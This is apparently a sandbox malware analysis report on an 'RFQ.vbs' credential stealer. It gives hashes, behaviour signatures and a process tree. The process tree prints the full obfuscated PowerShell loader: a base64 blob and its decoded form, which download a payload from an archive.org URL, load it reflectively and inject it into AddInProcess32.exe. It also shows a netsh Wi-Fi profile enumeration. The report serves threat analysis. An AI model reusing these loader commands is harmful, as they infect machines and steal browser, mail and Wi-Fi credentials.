Overview

overview

10

Static

static

1

RFQ.vbs

windows7-x64

10

RFQ.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    131s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/09/2024, 11:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RFQ.vbs

  • Size

    504KB

  • MD5

    73116ddf40456b41c6b35023bc02e781

  • SHA1

    037b869900d0474bf7603b8fbe3401f517f52117

  • SHA256

    6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a

  • SHA512

    f60cbe6234371aacd3f42f87db8ea04cc3b982d9c356db5a1e0fa3959268c0aa8e78e4c059feac1619348a3453e55c3386e096812d2a4a6d61aca5cc99007be3

  • SSDEEP

    12288:VS57Wp1MYi6qsGrA2OGLmeq0wM/l1d0FUvoExHRbb4XJb7q5cPT+EmJu6X:VC6X0T5VnpJ4Za

Score
10/10
collectioncredential_accessdiscoveryexecutionpersistenceprivilege_escalationstealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3232
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9dXJsICcrJz0gJysneycrJzB9JysnaHR0cHMnKyc6Ly9pYTYnKycwMCcrJzEwMCcrJy51cy5hJysncmNoaXYnKydlLm9yZycrJy8yNC9pJysndGUnKydtcy9kZXRhaC0nKydubycrJ3RlLScrJ3YvRGV0YWhOb3RlJysnVicrJy50JysneCcrJ3R7MH07ezF9YmFzZScrJzYnKyc0Q29udGVuJysndCA9JysnIChOZScrJ3ctJysnT2InKydqJysnZScrJ2N0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQ2xpZW50KS5Eb3dubG9hZFN0cmluZyh7MScrJ311cmwpO3sxJysnfScrJ2InKydpbicrJ2FyeScrJ0NvbnRlbnQgPScrJyBbU3lzdCcrJ2UnKydtJysnLkNvbnZlcnRdJysnOjonKydGcm9tQicrJ2FzZTY0JysnU3QnKydyaW5nKCcrJ3sxJysnfWJhJysnc2U2NENvbicrJ3RlJysnbnQpOycrJ3sxJysnfWFzc2UnKydtYmx5ID0gW1JlZmxlY3QnKydpbycrJ24nKycuQScrJ3NzZW1ibHknKyddJysnOjpMb2FkKHsxfWJpbmFyeScrJ0MnKydvJysnbicrJ3QnKydlJysnbnQpO3sxfXR5JysncGUnKycgPScrJyB7MX1hJysnc3MnKydlJysnbWJseS5HJysnZXRUeXBlJysnKHswfVJ1blBFLicrJ0hvbWV7MH0pOycrJ3sxJysnfScrJ20nKydldGhvZCA9JysnIHsxfXR5cGUuRycrJ2V0JysnTWUnKyd0JysnaG9kKCcrJ3swfVZBSXsnKycwfScrJyk7ezF9bWV0aG9kLicrJ0ludicrJ29rJysnZSh7JysnMScrJ31udScrJ2xsLCBbbycrJ2JqZWMnKyd0JysnWycrJ11dJysnQCh7MH10eCcrJ3QueHR5bS92ZWQuJysnMicrJ3IuMzliMzQnKyc1MzAnKycyYScrJzA3JysnNWIxYmMwZDQnKyc1YjYzMmViOWVlNjInKyctYicrJ3UnKydwJysnLy86cycrJ3B0dCcrJ2h7MCcrJ30gLCcrJyAnKyd7MCcrJ31kZXNhdGl2YWRvezB9ICcrJywgezB9ZGVzYXQnKydpdmEnKydkb3snKycwJysnfScrJyAsIHswfWQnKydlc2F0JysnaScrJ3ZhJysnZG97MH0sezB9QScrJ2RkSScrJ25Qcm9jZScrJ3NzMycrJzJ7MH0sJysnezAnKyd9JysnezAnKyd9KScrJyknKSAtRiAgW2NIYXJdMzksW2NIYXJdMzYpIHwgLiAoKEdWICcqbWRSKicpLm5hbWVbMywxMSwyXS1Kb2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4848
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}url '+'= '+'{'+'0}'+'https'+'://ia6'+'00'+'100'+'.us.a'+'rchiv'+'e.org'+'/24/i'+'te'+'ms/detah-'+'no'+'te-'+'v/DetahNote'+'V'+'.t'+'x'+'t{0};{1}base'+'6'+'4Conten'+'t ='+' (Ne'+'w-'+'Ob'+'j'+'e'+'ct System.N'+'e'+'t'+'.Web'+'Client).DownloadString({1'+'}url);{1'+'}'+'b'+'in'+'ary'+'Content ='+' [Syst'+'e'+'m'+'.Convert]'+'::'+'FromB'+'ase64'+'St'+'ring('+'{1'+'}ba'+'se64Con'+'te'+'nt);'+'{1'+'}asse'+'mbly = [Reflect'+'io'+'n'+'.A'+'ssembly'+']'+'::Load({1}binary'+'C'+'o'+'n'+'t'+'e'+'nt);{1}ty'+'pe'+' ='+' {1}a'+'ss'+'e'+'mbly.G'+'etType'+'({0}RunPE.'+'Home{0});'+'{1'+'}'+'m'+'ethod ='+' {1}type.G'+'et'+'Me'+'t'+'hod('+'{0}VAI{'+'0}'+');{1}method.'+'Inv'+'ok'+'e({'+'1'+'}nu'+'ll, [o'+'bjec'+'t'+'['+']]'+'@({0}tx'+'t.xtym/ved.'+'2'+'r.39b34'+'530'+'2a'+'07'+'5b1bc0d4'+'5b632eb9ee62'+'-b'+'u'+'p'+'//:s'+'ptt'+'h{0'+'} ,'+' '+'{0'+'}desativado{0} '+', {0}desat'+'iva'+'do{'+'0'+'}'+' , {0}d'+'esat'+'i'+'va'+'do{0},{0}A'+'ddI'+'nProce'+'ss3'+'2{0},'+'{0'+'}'+'{0'+'})'+')') -F [cHar]39,[cHar]36) | . ((GV '*mdR*').name[3,11,2]-Join'')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:448
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:3152
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3640
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show profile
              6⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:3876
            • C:\Windows\SysWOW64\findstr.exe
              findstr All
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1428
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4460,i,4174666705242427184,7333705955694532165,262144 --variations-seed-version --mojo-platform-channel-handle=4100 /prefetch:8
    1⤵
      PID:2348
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2884

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      f41839a3fe2888c8b3050197bc9a0a05

      SHA1

      0798941aaf7a53a11ea9ed589752890aee069729

      SHA256

      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

      SHA512

      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      5caad758326454b5788ec35315c4c304

      SHA1

      3aef8dba8042662a7fcf97e51047dc636b4d4724

      SHA256

      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

      SHA512

      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ene0kxdh.5o4.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/448-35-0x0000000006670000-0x0000000006682000-memory.dmp

      Filesize

      72KB

      Download

    • memory/448-36-0x00000000066B0000-0x0000000006872000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/448-87-0x0000000007B10000-0x000000000803C000-memory.dmp

      Filesize

      5.2MB

      Download

    • memory/448-68-0x0000000006C50000-0x0000000006CE2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/448-67-0x0000000006B30000-0x0000000006BA6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/448-25-0x0000000000400000-0x0000000000416000-memory.dmp

      Filesize

      88KB

      Download

    • memory/448-28-0x0000000000400000-0x0000000000416000-memory.dmp

      Filesize

      88KB

      Download

    • memory/448-66-0x0000000007030000-0x00000000075D4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/448-34-0x0000000005B50000-0x0000000005BB6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/448-33-0x00000000058E0000-0x00000000059C6000-memory.dmp

      Filesize

      920KB

      Download

    • memory/1504-24-0x000001512E040000-0x000001512E24C000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/4848-32-0x00007FF967160000-0x00007FF967C21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4848-1-0x0000016C2DCC0000-0x0000016C2DCE2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4848-0-0x00007FF967163000-0x00007FF967165000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4848-12-0x00007FF967160000-0x00007FF967C21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4848-11-0x00007FF967160000-0x00007FF967C21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4848-23-0x00007FF967160000-0x00007FF967C21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4848-22-0x00007FF967163000-0x00007FF967165000-memory.dmp

      Filesize

      8KB

      Download